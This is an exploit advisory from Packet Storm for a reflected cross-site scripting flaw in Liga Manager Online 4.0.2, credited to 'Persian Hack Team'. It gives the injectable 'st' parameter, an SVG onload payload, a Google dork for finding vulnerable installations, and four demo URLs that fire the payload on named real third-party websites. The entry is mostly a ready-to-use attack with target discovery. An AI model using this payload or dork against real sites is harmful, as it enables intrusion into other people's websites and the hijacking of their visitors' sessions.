Liga Manager Online (LMO) version 4.0.2 suffers from a cross site scripting vulnerability.
358152c719929c66f18bb18ab62a8b3eeebb75937d2b29b29d9a8f5fa35b037a######################
# Exploit Title : LMO 4.0.2 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.liga-manager-online.de/homepage/
# Google Dork : "LMO 4.0.2" inurl:"st="
# Date: 2016/01/28
# Version = 4.0.2
######################
# PoC: st=[XSS]
# Payload = '>Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team
# Demo :
#http://www.wildeligabremen.com/LMO/lmo.php?action=results&file=noname.l98&st=13%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.bb-american-dart.de/lmo/lmo.php?action=results&file=C-Liga.l98&st=14%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.fortuna-futsal.de/lmo2/lmo.php?action=results&file=Niederrheinliga%202015-2016.l98&st=4%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.uslaval.it/liga/lmo.php?action=results&file=La%20Val.l98&st=3%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&PHPSESSID=83b06c0e762470bcd58c8fac2ce9a19d
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed